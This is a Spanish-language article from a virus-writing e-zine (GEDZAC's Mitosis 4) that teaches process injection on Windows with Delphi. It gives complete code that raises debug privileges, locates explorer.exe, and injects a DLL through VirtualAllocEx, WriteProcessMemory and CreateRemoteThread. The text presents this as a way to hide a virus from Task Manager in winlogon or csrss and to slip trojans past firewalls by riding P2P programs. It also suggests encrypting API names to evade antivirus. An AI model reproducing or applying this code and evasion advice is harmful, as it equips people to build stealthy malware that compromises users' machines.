<html>
<head>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0066cc; 
	SCROLLBAR-SHADOW-COLOR: #0066cc; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #0066cc; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style63 {font-family: "Courier New", Courier, monospace; font-size: 14px; color: #f88204; font-weight: bold; }
.style66 {color: #CCCCCC}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style100 {font-size: 14px; color: #0066CC; font-weight: bold; font-family: "Courier New", Courier, monospace;}
.style136 {color: #999999}
.style139 {
	color: #FFFF00;
	font-weight: bold;
}


-->

</style>
</head>

<body>

  <div align="left">
<p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Inyecciones de procesos</span><br>
    #Autor: <strong>Khronos[GEDZAC] <em>&lt;khronos[at]gedzac[dot]com&gt;</em></strong></span><br>
    </p>
</div>
  <div align="left" class="style55">
    <p align="justify">  B&aacute;sicamente de lo que trata este art&iacute;culo es sobre la &ldquo;inyecci&oacute;n&rdquo; del  c&oacute;digo de un ejecutable en un proceso remoto por medio de la funci&oacute;n de la API  (<strong>Application Programming Interface</strong>) <strong>CreateRemoteThread.</strong><strong>Inyectar una funci&oacute;n de la API de  Windows en un proceso.</strong>En este sencillo ejemplo comprobaremos como funciona la funcion CreateRemoteThread:</p>
    
    <p><span class="style136"><strong>Var</strong><br>
    MsgBox : function(hWnd: HWND; lpText,  lpCaption: PWideChar; uType: UINT): Integer;<br>
    hProc: THandle;<br>
    Thread: DWORD;<br>
    <strong>Begin</strong><br>
    MsgBox:=  GetProcAddress(LoadLibrary('user32.dll'), 'MessageBoxW');<br>
    hProc:=  OpenProcess(PROCESS_ALL_ACCESS, False, 1128);<br>
    CreateRemoteThread(hProc, nil, 0,  @MsgBox, POINTER(0), 0, Thread);<br>
    <strong>End;</strong></span></p>
    <div></div>
    <p align="justify">Expliquemos  un poco el c&oacute;digo anterior: MsgBox es un puntero que apunta a la direcci&oacute;n de  memoria de la function <strong>MessageBoxW</strong> en la librer&iacute;a <strong>user32.dl</strong>l. hProc es  el handle de un proceso cualquiera que abrimos en modo <strong>PROCESS_ALL_ACCESS</strong>.
    Luego  llamamos a la function <strong>CreateRemoteThread</strong> con los argumentos requeridos y se nos tendr&aacute; que abrir un MessageBox como  este:</p>
    <p align="justify"><strong>Inyectar  una librer&iacute;a en un proceso</strong><br>Para  inyectar el c&oacute;digo de una librer&iacute;a (<strong>Dynamic  Link Library</strong>) o biblioteca de enlace din&aacute;mico, utilizaremos el m&eacute;todo  anterior y nos basaremos en la funci&oacute;n de la API de Windows <strong>LoadLibrary</strong>. Con la funci&oacute;n <strong>CreateRemoteThread inyectaremos</strong> en un proceso la function <strong>LoadLibrary</strong> pas&aacute;ndole como puntero la  direcci&oacute;n de la dll que vamos a inyectar en el proceso.</p>
    <p align="justify">Empezamos  creando el c&oacute;digo de nuestra librer&iacute;a:</p>
    <div></div>
    <p class="style136">library  Proc;</p>
    <p class="style136">uses<br>
  &nbsp; Windows;</p>
    <p class="style136">begin<br>
  &nbsp; MessageBox(0, 'GEDZAC', '...', 0);<br>
      end.</p>
    <div class="style136"></div>
    <p align="justify">Las  librer&iacute;as no se pueden ejecutar como los ejecutables, pero si tienen una  secci&oacute;n de c&oacute;digo que se ejecuta cuando las llamas con <strong>Rundll.exe</strong> o mediante la API <strong>LoadLibrary</strong> que vendr&iacute;a a ser lo mismo. Por ejemplo:<br>
  &nbsp;&nbsp;&nbsp;&nbsp;<br>
      Poniendo  esto en la l&iacute;nea de commandos:&nbsp;&nbsp; <span class="style139">Rundll32.exe C:\Proc.dll, 0</span></p>
    <p align="justify">Ahora  vamos a crear el ejecutable inyector de la librer&iacute;a de enlace din&aacute;mico en un  proceso.</p>
    <p><span class="style136"><strong>Program</strong> Inyector;</span></p>
    <p class="style136">{$SetPeFlags  1} <br>
      //S&oacute;lo  versiones superiores al Delphi 2005, reduce el tama&ntilde;o del ejecutable<br>
      {$APPTYPE  GUI}</p>
    <p class="style136"><strong>Uses</strong><br>
      Windows;</p>
    <p class="style136"><strong>function</strong> EnabledDebugPrivilege(<strong>const</strong> Enabled : Boolean) : Boolean;<br>
        <strong>var</strong><br>
      hTk  : THandle;<br>
      rtnTemp  : Dword;<br>
      TokenPri  : TOKEN_PRIVILEGES;<br>
  <strong>const</strong><br>
      SE_DEBUG  = 'SeDebugPrivilege';<br>
  <strong>begin</strong><br>
      Result  := False;<br>
  <strong>if</strong> (OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,hTk)) <strong>then</strong><br>
  <strong>begin</strong><br>
      TokenPri.PrivilegeCount  := 1;<br>
      LookupPrivilegeValue(nil,SE_DEBUG,TokenPri.Privileges[0].Luid);</p>
    <p class="style136"><strong>if</strong> Enabled<strong> then</strong><br>
      TokenPri.Privileges[0].Attributes  := SE_PRIVILEGE_ENABLED<br>
  <strong>else</strong><br>
      TokenPri.Privileges[0].Attributes  := 0;</p>
    <p class="style136">rtnTemp  := 0;<br>
      AdjustTokenPrivileges(hTk,False,TokenPri,sizeof(TokenPri),nil,rtnTemp);</p>
    <p class="style136">Result  := GetLastError = ERROR_SUCCESS;<br>
      CloseHandle(hTk);</p>
    <p class="style136"><strong>end;</strong><br>
        <strong>end;</strong></p>
    <p class="style136">&nbsp;</p>
    <p class="style136"><strong>function</strong> GetProcessID(Exename: string): DWORD;<br>
        <strong>var</strong><br>
      hProcSnap:  THandle;<br>
      pe32:  TProcessEntry32;<br>
  <strong>begin</strong><br>
      result  := 0;<br>
      hProcSnap  := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0);<br>
  <strong>if</strong> hProcSnap &lt;&gt;  INVALID_HANDLE_VALUE <strong>then</strong><br>
  <strong>begin</strong><br>
      pe32.dwSize  := SizeOf(ProcessEntry32);<br>
  <strong>if</strong> Process32First(hProcSnap, pe32) =  true<strong> then</strong><br>
  <strong>begin</strong><br>
  <strong>while</strong> Process32Next(hProcSnap, pe32) = true <strong>do</strong><br>
  <strong>begin</strong><br>
  <strong>if</strong> pos(Exename, pe32.szExeFile) &lt;&gt;  0 <strong>then</strong><br>
      result  := pe32.th32ProcessID;<br>
  <strong>end;</strong><br>
  <strong>end;</strong><br>
      CloseHandle(hProcSnap);<br>
  <strong>end;</strong><br>
  <strong>end;</strong></p>
    <p class="style136"><strong>function</strong> InjectTo(const Host, Guest: string):  DWORD;<br>
        <strong>var</strong><br>
      hRemoteProcess:  THandle; <br>
      dwRemoteProcessId:  DWORD; <br>
      memSize:  DWORD; <br>
      pszLibFileRemote:  Pointer;<br>
      iReturnCode:  Boolean;<br>
      TempVar:  DWORD;<br>
      pfnStartAddr:  TFNThreadStartRoutine;<br>
      pszLibAFilename:  PwideChar;<br>
  <strong>begin</strong><br>
      Result  := 0;<br>
      EnabledDebugPrivilege(True);<br>
      Getmem(pszLibAFilename,  Length(Guest) * 2 + 1);<br>
      StringToWideChar(Guest,  pszLibAFilename, Length(Guest) * 2 + 1);<br>
      dwRemoteProcessID:=GetProcessId(host);</p>
    <p class="style136">hRemoteProcess  := OpenProcess(PROCESS_CREATE_THREAD + PROCESS_VM_OPERATION +<br>
      PROCESS_VM_WRITE,<br>
      FALSE,  dwRemoteProcessId);</p>
    <p class="style136">memSize  := (1 + lstrlenW(pszLibAFilename)) * sizeof(WCHAR)*2;</p>
    <p class="style136">pszLibFileRemote  := PWIDESTRING(VirtualAllocEx(hRemoteProcess, nil, memSize, MEM_COMMIT,  PAGE_READWRITE));<br>
      TempVar  := 0;<br>
      iReturnCode  := WriteProcessMemory(hRemoteProcess, pszLibFileRemote, pszLibAFilename,  memSize, TempVar);<br>
  <strong>if </strong>iReturnCode <strong>then</strong><br>
  <strong>begin</strong><br>
      pfnStartAddr  := GetProcAddress(GetModuleHandle('Kernel32'), 'LoadLibraryW');<br>
      TempVar  := 0;<br>
      Result  := CreateRemoteThread(hRemoteProcess, nil, 0, pfnStartAddr, pszLibFileRemote,  0, TempVar);<br>
  <strong>end;</strong></p>
    <p class="style136">Freemem(pszLibAFilename);<br>
        <strong>end;</strong></p>
    <p class="style136"><strong>//Inicio del programa</strong><br>
        <strong>begin</strong><br>
  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; InjectTo(&lsquo;explorer.exe&rsquo;,  &lsquo;C:\Proc.dll&rsquo;);<br>
  <strong>end.</strong></p>
    <div></div>
    <p align="justify">Explicaci&oacute;n  del c&oacute;digo:<br>
  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; La funci&oacute;n InjectTo carga mediante  la API de Windows <strong>LoadLibrary</strong> una  librer&iacute;a de enlace din&aacute;mico en un nuevo Thread dentro de un proceso. Recomiendo  que se busque informaci&oacute;n en <strong>MSDN</strong> sobre cada una de las funciones de la API de windows que empleo.. Lo que hago  es reservar espacio en la memoria de un proceso para poder crear el nuevo  Thread, que va a ser nuestra dll.</p>
    <p><strong>&nbsp;</strong></p>
    <ul>
      <li class="style63"><strong>Utilidad de las inyecciones  de memoria.</strong></li>
    </ul>
    <p align="justify">Pues  bien, la posibilidad m&aacute;s clara que vemos a simple vista es que conseguimos que  nuestro virus sea invisible en el TaskManager, recomiendo que se emple la API <strong>CreateRemoteThread</strong> con el proceso  winlogon o csrss, ya que en ning&uacute;n momento se van a poder detener esos procesos  porque son vitals para el Sistema Operativo.</p>
    <p align="justify">Otra  posibilidad que no se ve a simple vista y que es muy interesante es la de crear  un troyano que emplee esta t&eacute;cnica. El virus se encargar&iacute;a de encontrar  procesos como Ares.exe, eMule.exe, Kazaa.exe o cualquier otro programa que  funcione como servidor en un pc, y cuando los encuentre inyectar&aacute; el c&oacute;digo del  troyano en &eacute;l.<br>
      El  problema de los troyanos es que cualquier FireWall los detecta cuando se ponen  a escuchar a trav&eacute;s de un puerto y la &uacute;nica forma de evitar que nos parara el  firewall era desactivandolo. El Firewall de Windows tiene mil formas de  desactivarlo, pero el de los antivirus no. Que es m&aacute;s f&aacute;cil, &iquest;crear un virus  que desactive todos los firewall del mercado?&nbsp;  o &iquest;uno que se los salte todos utilizando otro programa de chivo  espiatorio?</p>
    <p align="justify">La  primera opci&oacute;n es la ideal, pero es inviable y la segunda es muy efectiva y la  puedes conseguir f&aacute;cilmente. Pero eso ya no entra dentro de este art&iacute;culo.</p>
    <p align="justify"><strong>Recomendaci&oacute;n: </strong>La API <strong>CreateRemoteThread</strong> es detectada por los antivirus por lo tanto la  soluci&oacute;n ser&iacute;a cargarla din&aacute;micamente con <strong>GetProcessAddress</strong> y cifrando su indentificador:</p>
    <div></div>
    <p class="style136"><strong>Var</strong><br>
      pThread:  function (hProcess: THandle; lpThreadAttributes: Pointer;<br>
  &nbsp; dwStackSize: DWORD; lpStartAddress:  TFNThreadStartRoutine; lpParameter: Pointer;<br>
  &nbsp; dwCreationFlags: DWORD; var lpThreadId:  DWORD): THandle;<br>
  <strong>begin</strong><br>
      pThread:= GetProcAddress(LoadLibrary('kernel32'),  'CreateRemoteThread');<br>
  <strong>end;</strong></p>
    <div></div>
    <p>Ser&iacute;a  algo as&iacute; aunque el string &lsquo;CreateRemoteThread&rsquo; lo tendr&iacute;amos cifrado.Bueno  aqu&iacute; se termina este manual, espero que te haya sido utilidad. Cualquier duda o  consejo a mi mail</p>
    <p align="justify"><br>
    </p>
    <p><br>
    </p>
    <p align="right" class="style100">(C) Mitosis 4 - GEDZAC LABS</p>
</div>
</body>
</html>
